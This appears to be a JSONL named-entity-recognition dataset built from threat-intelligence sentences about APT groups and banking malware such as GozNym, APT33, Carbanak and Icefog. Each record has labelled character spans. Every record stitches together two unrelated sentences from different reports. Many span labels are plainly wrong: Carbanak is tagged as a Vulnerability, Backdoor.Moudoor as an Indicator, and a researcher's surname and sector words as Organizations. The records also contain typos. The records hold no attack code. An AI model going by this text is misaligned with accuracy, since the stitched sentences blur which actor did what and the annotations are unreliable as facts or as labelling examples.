{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 189, "end": 195, "label": "Malware"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 227, "end": 232, "label": "Organization"}]}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 202, "end": 207, "label": "Organization"}]}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 314, "end": 318, "label": "Organization"}, {"start": 354, "end": 360, "label": "Organization"}]}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . The malware is distributed primarily through laced spam emails that lure recipients into opening attachments .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}]}
{"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . Kessem .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 105, "end": 112, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}]}
{"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 48, "end": 61, "label": "Organization"}, {"start": 83, "end": 98, "label": "Organization"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 200, "end": 207, "label": "Organization"}, {"start": 208, "end": 214, "label": "Malware"}, {"start": 250, "end": 255, "label": "Organization"}]}
{"text": "The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 61, "end": 70, "label": "Organization"}, {"start": 73, "end": 81, "label": "Organization"}, {"start": 86, "end": 98, "label": "Organization"}, {"start": 117, "end": 140, "label": "System"}, {"start": 149, "end": 159, "label": "System"}, {"start": 175, "end": 195, "label": "System"}, {"start": 202, "end": 208, "label": "Malware"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 239, "end": 251, "label": "Organization"}, {"start": 271, "end": 277, "label": "Organization"}, {"start": 280, "end": 298, "label": "Organization"}, {"start": 310, "end": 313, "label": "Organization"}]}
{"text": "The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 42, "end": 57, "label": "Organization"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 98, "end": 106, "label": "Organization"}, {"start": 146, "end": 152, "label": "Malware"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 178, "end": 182, "label": "Malware"}, {"start": 183, "end": 190, "label": "Malware"}]}
{"text": "The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 97, "end": 108, "label": "Organization"}, {"start": 230, "end": 236, "label": "Malware"}, {"start": 327, "end": 332, "label": "Organization"}]}
{"text": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym \u2013 Nymaim \u2013 appear up to the task .", "spans": [{"start": 3, "end": 6, "label": "Organization"}, {"start": 7, "end": 11, "label": "Organization"}, {"start": 95, "end": 106, "label": "Organization"}, {"start": 338, "end": 342, "label": "Organization"}, {"start": 378, "end": 384, "label": "Organization"}, {"start": 409, "end": 415, "label": "Malware"}]}
{"text": "The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 35, "label": "Organization"}, {"start": 54, "end": 63, "label": "Organization"}, {"start": 121, "end": 142, "label": "System"}, {"start": 151, "end": 161, "label": "System"}, {"start": 172, "end": 182, "label": "Organization"}, {"start": 187, "end": 202, "label": "Organization"}, {"start": 219, "end": 234, "label": "Organization"}]}
{"text": "The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 31, "end": 36, "label": "Organization"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 122, "end": 143, "label": "System"}, {"start": 152, "end": 162, "label": "System"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 188, "end": 203, "label": "Organization"}, {"start": 220, "end": 235, "label": "Organization"}, {"start": 273, "end": 279, "label": "Malware"}, {"start": 357, "end": 362, "label": "Organization"}]}
{"text": "The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 81, "end": 99, "label": "Organization"}, {"start": 102, "end": 110, "label": "Organization"}, {"start": 113, "end": 123, "label": "Organization"}, {"start": 130, "end": 145, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 220, "end": 226, "label": "Malware"}, {"start": 336, "end": 342, "label": "Organization"}]}
{"text": "The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 81, "end": 99, "label": "Organization"}, {"start": 102, "end": 110, "label": "Organization"}, {"start": 113, "end": 123, "label": "Organization"}, {"start": 130, "end": 145, "label": "Organization"}, {"start": 170, "end": 176, "label": "Malware"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 317, "end": 332, "label": "Organization"}, {"start": 337, "end": 360, "label": "Organization"}]}
{"text": "FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 28, "end": 37, "label": "Organization"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 149, "end": 161, "label": "Organization"}, {"start": 296, "end": 304, "label": "Organization"}]}
{"text": "They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 53, "end": 62, "label": "Organization"}, {"start": 65, "end": 73, "label": "Organization"}, {"start": 78, "end": 90, "label": "Organization"}, {"start": 109, "end": 132, "label": "System"}, {"start": 141, "end": 151, "label": "System"}, {"start": 167, "end": 187, "label": "System"}, {"start": 296, "end": 307, "label": "Malware"}, {"start": 310, "end": 326, "label": "Indicator"}, {"start": 333, "end": 347, "label": "Malware"}]}
{"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries . We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years .", "spans": [{"start": 85, "end": 90, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 177, "end": 196, "label": "Organization"}, {"start": 199, "end": 204, "label": "Organization"}, {"start": 209, "end": 238, "label": "Organization"}, {"start": 264, "end": 267, "label": "System"}, {"start": 314, "end": 325, "label": "Organization"}, {"start": 388, "end": 396, "label": "Organization"}]}
{"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years .", "spans": [{"start": 85, "end": 95, "label": "Organization"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 202, "end": 221, "label": "Organization"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 234, "end": 263, "label": "Organization"}, {"start": 275, "end": 289, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]}
{"text": "TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 47, "end": 73, "label": "Organization"}, {"start": 76, "end": 79, "label": "Organization"}, {"start": 163, "end": 173, "label": "Organization"}, {"start": 176, "end": 186, "label": "Organization"}, {"start": 189, "end": 202, "label": "Organization"}, {"start": 205, "end": 224, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 261, "end": 279, "label": "Organization"}, {"start": 304, "end": 310, "label": "Malware"}, {"start": 354, "end": 359, "label": "Organization"}, {"start": 451, "end": 466, "label": "Organization"}, {"start": 471, "end": 494, "label": "Organization"}]}
{"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 expos\u00e9 on Hidden Lynx .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 31, "end": 51, "label": "Organization"}, {"start": 54, "end": 78, "label": "Organization"}, {"start": 83, "end": 140, "label": "Organization"}, {"start": 353, "end": 364, "label": "Organization"}]}
{"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 31, "end": 51, "label": "Organization"}, {"start": 89, "end": 105, "label": "Organization"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 155, "end": 165, "label": "Organization"}, {"start": 177, "end": 191, "label": "Organization"}, {"start": 196, "end": 210, "label": "Organization"}, {"start": 268, "end": 275, "label": "Organization"}, {"start": 362, "end": 371, "label": "Malware"}]}
{"text": "FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}, {"start": 74, "end": 86, "label": "Organization"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 211, "end": 218, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 245, "end": 258, "label": "Organization"}, {"start": 366, "end": 377, "label": "Malware"}, {"start": 380, "end": 396, "label": "Indicator"}, {"start": 403, "end": 417, "label": "Malware"}]}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": [{"start": 137, "end": 148, "label": "Organization"}, {"start": 151, "end": 161, "label": "Organization"}, {"start": 164, "end": 180, "label": "Organization"}, {"start": 183, "end": 197, "label": "Organization"}, {"start": 204, "end": 214, "label": "Organization"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 271, "end": 279, "label": "Organization"}, {"start": 343, "end": 354, "label": "Malware"}, {"start": 359, "end": 375, "label": "Indicator"}, {"start": 394, "end": 400, "label": "Malware"}, {"start": 410, "end": 424, "label": "Organization"}, {"start": 434, "end": 445, "label": "Organization"}]}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide .", "spans": [{"start": 137, "end": 148, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}, {"start": 166, "end": 182, "label": "Organization"}, {"start": 185, "end": 199, "label": "Organization"}, {"start": 206, "end": 216, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 317, "end": 323, "label": "Malware"}, {"start": 330, "end": 360, "label": "Malware"}, {"start": 364, "end": 370, "label": "Malware"}]}
{"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 59, "end": 79, "label": "Organization"}, {"start": 117, "end": 130, "label": "Organization"}, {"start": 133, "end": 150, "label": "Organization"}, {"start": 157, "end": 176, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 226, "end": 237, "label": "Organization"}]}
{"text": "APT33 has targeted organizations \u2013 spanning multiple industries \u2013 headquartered in the United States , Saudi Arabia and South Korea . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 35, "end": 63, "label": "Organization"}, {"start": 239, "end": 245, "label": "Malware"}, {"start": 261, "end": 285, "label": "Organization"}, {"start": 290, "end": 306, "label": "Organization"}]}
{"text": "During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 87, "end": 99, "label": "Organization"}, {"start": 104, "end": 118, "label": "Organization"}, {"start": 150, "end": 158, "label": "Organization"}]}
{"text": "The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors . With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers .", "spans": [{"start": 55, "end": 61, "label": "Organization"}, {"start": 66, "end": 80, "label": "Organization"}, {"start": 146, "end": 159, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 284, "end": 290, "label": "Malware"}]}
{"text": "APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . Since January 2013 , we've been on the lookout for a possible RedOctober comeback .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 48, "end": 57, "label": "Organization"}, {"start": 62, "end": 68, "label": "Organization"}, {"start": 137, "end": 149, "label": "Organization"}, {"start": 250, "end": 260, "label": "Organization"}]}
{"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 18, "end": 26, "label": "Organization"}, {"start": 90, "end": 98, "label": "Organization"}, {"start": 175, "end": 183, "label": "Organization"}]}
{"text": "Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": [{"start": 53, "end": 62, "label": "Organization"}, {"start": 67, "end": 81, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 178, "end": 188, "label": "Organization"}, {"start": 192, "end": 200, "label": "Organization"}, {"start": 292, "end": 305, "label": "Vulnerability"}]}
{"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 18, "end": 26, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 184, "end": 192, "label": "Organization"}]}
{"text": "In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities . The Cloud Atlas implants utilize a rather unusual C&C mechanism .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 183, "end": 194, "label": "Organization"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 225, "end": 235, "label": "Organization"}, {"start": 240, "end": 259, "label": "Organization"}]}
{"text": "We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month .", "spans": [{"start": 33, "end": 38, "label": "Organization"}, {"start": 41, "end": 46, "label": "Organization"}, {"start": 53, "end": 72, "label": "Organization"}, {"start": 100, "end": 105, "label": "Organization"}]}
{"text": "The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 19, "end": 31, "label": "Organization"}, {"start": 61, "end": 77, "label": "Organization"}, {"start": 159, "end": 181, "label": "Organization"}]}
{"text": "APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 26, "end": 51, "label": "Organization"}, {"start": 87, "end": 102, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 140, "end": 158, "label": "Organization"}, {"start": 176, "end": 186, "label": "Organization"}, {"start": 291, "end": 317, "label": "Organization"}, {"start": 320, "end": 323, "label": "Organization"}]}
{"text": "APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 22, "end": 62, "label": "Organization"}, {"start": 149, "end": 169, "label": "Organization"}, {"start": 404, "end": 431, "label": "Organization"}, {"start": 445, "end": 452, "label": "System"}, {"start": 556, "end": 579, "label": "Organization"}]}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 30, "end": 43, "label": "Organization"}, {"start": 48, "end": 52, "label": "Organization"}, {"start": 60, "end": 80, "label": "Organization"}, {"start": 128, "end": 147, "label": "Organization"}, {"start": 160, "end": 167, "label": "Organization"}, {"start": 190, "end": 203, "label": "Organization"}, {"start": 206, "end": 231, "label": "Organization"}, {"start": 238, "end": 258, "label": "Organization"}, {"start": 265, "end": 271, "label": "System"}, {"start": 282, "end": 302, "label": "System"}, {"start": 316, "end": 326, "label": "Indicator"}, {"start": 331, "end": 341, "label": "System"}, {"start": 358, "end": 372, "label": "System"}, {"start": 390, "end": 402, "label": "Indicator"}]}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 30, "end": 43, "label": "Organization"}, {"start": 48, "end": 52, "label": "Organization"}, {"start": 60, "end": 80, "label": "Organization"}, {"start": 111, "end": 130, "label": "Organization"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 167, "end": 192, "label": "Organization"}, {"start": 199, "end": 219, "label": "Organization"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 271, "end": 277, "label": "System"}, {"start": 291, "end": 295, "label": "System"}, {"start": 309, "end": 319, "label": "Indicator"}, {"start": 362, "end": 366, "label": "System"}, {"start": 403, "end": 413, "label": "Organization"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . attacks using this tool were still active as of April 2016 .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}]}
{"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well .", "spans": [{"start": 72, "end": 80, "label": "Vulnerability"}, {"start": 97, "end": 115, "label": "Organization"}, {"start": 126, "end": 143, "label": "Organization"}, {"start": 146, "end": 161, "label": "Organization"}, {"start": 166, "end": 178, "label": "Organization"}]}
{"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": [{"start": 10, "end": 18, "label": "Vulnerability"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 65, "end": 83, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 158, "end": 168, "label": "Indicator"}, {"start": 232, "end": 243, "label": "Indicator"}, {"start": 266, "end": 269, "label": "System"}, {"start": 276, "end": 287, "label": "Indicator"}]}
{"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": [{"start": 11, "end": 19, "label": "Vulnerability"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 91, "end": 106, "label": "Organization"}, {"start": 158, "end": 167, "label": "Indicator"}, {"start": 210, "end": 230, "label": "System"}]}
{"text": "The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research . Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide .", "spans": [{"start": 4, "end": 20, "label": "Organization"}, {"start": 90, "end": 107, "label": "Organization"}, {"start": 110, "end": 117, "label": "Organization"}, {"start": 293, "end": 297, "label": "Malware"}, {"start": 314, "end": 324, "label": "Organization"}, {"start": 329, "end": 337, "label": "Organization"}]}
{"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": [{"start": 38, "end": 45, "label": "Organization"}, {"start": 99, "end": 109, "label": "Organization"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 155, "end": 177, "label": "Organization"}, {"start": 316, "end": 324, "label": "Organization"}]}
{"text": "Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets .", "spans": [{"start": 17, "end": 23, "label": "Organization"}, {"start": 49, "end": 54, "label": "Organization"}, {"start": 59, "end": 81, "label": "Organization"}, {"start": 152, "end": 156, "label": "Malware"}, {"start": 250, "end": 256, "label": "Malware"}]}
{"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed .", "spans": [{"start": 17, "end": 32, "label": "Organization"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 66, "end": 75, "label": "Organization"}, {"start": 88, "end": 110, "label": "Organization"}, {"start": 160, "end": 168, "label": "Vulnerability"}, {"start": 173, "end": 179, "label": "System"}, {"start": 305, "end": 318, "label": "Organization"}, {"start": 321, "end": 325, "label": "Organization"}, {"start": 328, "end": 332, "label": "Organization"}]}
{"text": "Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 86, "end": 96, "label": "Organization"}, {"start": 99, "end": 107, "label": "Organization"}, {"start": 113, "end": 128, "label": "Organization"}, {"start": 291, "end": 300, "label": "Organization"}]}
{"text": "There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": [{"start": 106, "end": 115, "label": "Organization"}, {"start": 146, "end": 153, "label": "Organization"}, {"start": 156, "end": 164, "label": "Organization"}, {"start": 171, "end": 189, "label": "Organization"}, {"start": 261, "end": 274, "label": "Organization"}, {"start": 279, "end": 305, "label": "Organization"}, {"start": 435, "end": 443, "label": "Organization"}]}
